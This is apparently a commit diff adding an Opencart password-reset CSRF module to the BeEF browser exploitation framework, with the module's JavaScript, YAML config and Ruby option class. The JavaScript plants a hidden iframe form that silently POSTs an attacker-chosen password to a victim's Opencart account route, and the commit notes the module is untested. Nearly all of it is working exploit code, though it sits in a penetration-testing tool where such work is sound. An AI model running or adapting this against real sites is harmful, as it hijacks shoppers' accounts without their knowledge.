Add Opencart password reset CSRF module

This module hasn't been tested against an Opencart instance

modules/exploits/opencart_reset_password/command.js

@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base     = '<%= @base %>'; 
+  var password = '<%= @password %>';
+
+  var opencart_reset_password_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+    {'type':'hidden', 'name':'password', 'value':password},
+    {'type':'hidden', 'name':'confirm',  'value':password}
+  ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(opencart_reset_password_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/opencart_reset_password/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        opencart_reset_password:
+            enable: true
+            category: "Exploits"
+            name: "Opencart Reset Password CSRF"
+            description: "Attempts to reset an Opencart user's password."
+            authors: ["Saadat Ullah", "bcoles"]
+            target:
+                unknown: ["ALL"]

modules/exploits/opencart_reset_password/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# This module has not been tested
+class Opencart_reset_password < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'Opencart path', 'value' => 'http://example.com/index.php?route=account/password'},
+			{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'beefbeef'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end